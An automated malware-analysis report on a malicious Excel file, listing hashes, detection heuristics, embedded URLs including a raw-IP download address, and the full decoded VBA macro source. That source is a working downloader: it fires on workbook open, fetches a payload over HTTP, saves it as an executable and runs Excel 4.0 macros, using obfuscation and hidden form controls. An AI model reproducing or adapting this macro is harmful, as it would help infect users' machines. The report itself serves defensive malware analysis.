Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 384e809707b59315…

MALICIOUS

Office (OLE)

141.9 KB Created: 2019-07-18 19:19:14 Authoring application: Microsoft Excel First seen: 2020-05-25
MD5: 5f6c61cccf8cb547a3979e1d49a7ef81 SHA-1: 122d8e7bf648bcf5c0c61f5e8bbe92aab3b14a7b SHA-256: 384e809707b593151d75d8c196b5b00019b060387da7f8c21a06c52c787e0cc9
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains VBA macros that trigger an Excel 4.0 macro stager. The stager uses CreateObject and CallByName to likely download and execute a second-stage payload from one of the embedded URLs. The presence of cmd.exe invocation heuristics further supports the execution of external commands.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
    time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    On Error Resume Next
    CallByName Class5, "Show", VbMethod
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub WorkBook_open()
    On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://27.102.70.196/k2 In document text (OLE body)
    • http://t2.symcb.com0In document text (OLE body)
    • http://tl.symcd.com0&In document text (OLE body)
    • http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)
    • http://tl.symcb.com/tl.crl0In document text (OLE body)
    • https://www.thawte.com/cps0/In document text (OLE body)
    • https://www.thawte.com/repository0WIn document text (OLE body)
    • http://tl.symcb.com/tl.crt0In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3342 bytes
SHA-256: 0f8d5393f732295ecb858d596155660fa6602c129079ec7d970b367fb929c19b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName Class5, "Show", VbMethod



End Sub





Attribute VB_Name = "CodeBlock"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub MethodENG()
Dim time

 
 Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(False, ""Release"")"



Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)

Dim fUP:  fUP = 0
#If FR_9 Then

Dim DirectionComponent_5
Dim DirectionComponent_6
Dim DirectionComponent_7
Dim DirectionComponent_9
Dim DirectionComponent_8: DirectionComponent_8 = 8
#End If
Dim DirectionComponent_12

Dim DirectionComponent_11: DirectionComponent_11 = ""
Dim fDOWN:  fDOWN = 0
fDOWN = 1
fDOWN = 2
fDOWN = 3
fDOWN = 4
End Sub




Attribute VB_Name = "ClaModu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub PublicSub()

CodeBlock.MethodENG


Dim DirectionComponent_4
Dim DirectionComponent_3
Class7.Label5_Click
Class7.Rocky1.Send

With Class7.Valaar1
    .Type = 1
End With
    Class7.Valaar1.Open
With Class7.Valaar1
    .write Class7.Rocky1.responseBody

End With
#If FR_0 Then
    CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2

#End If

ExecuteExcel4Macro Class7.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""Fix Marv"")"
End Sub


Attribute VB_Name = "Class7"
Attribute VB_Base = "0{BCDF87D8-10FE-4A45-9037-E1DA98118387}{A67BF4E4-00B4-417B-8495-74F7DD38C327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Rocky2 As Object
 Public Valaar3 As Object
Public Rocky1 As Object
 Public Valaar2 As Object
Public Rocky3 As Object
 Public Valaar1 As Object


Public Sub Label5_Click()
Dim DirectionComponent_5
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim DirectionComponent_6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub



Attribute VB_Name = "Class5"
Attribute VB_Base = "0{91950FA9-49B3-4930-930C-C2569C5DA979}{FF977004-D6B6-4519-B08E-2136C0F2ABC7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Sub FUnt()
Dim rd1 As New ClaModu
rd1.PublicSub

End Sub

Private Sub UserForm_Initialize()

FUnt
Unload Me
End Sub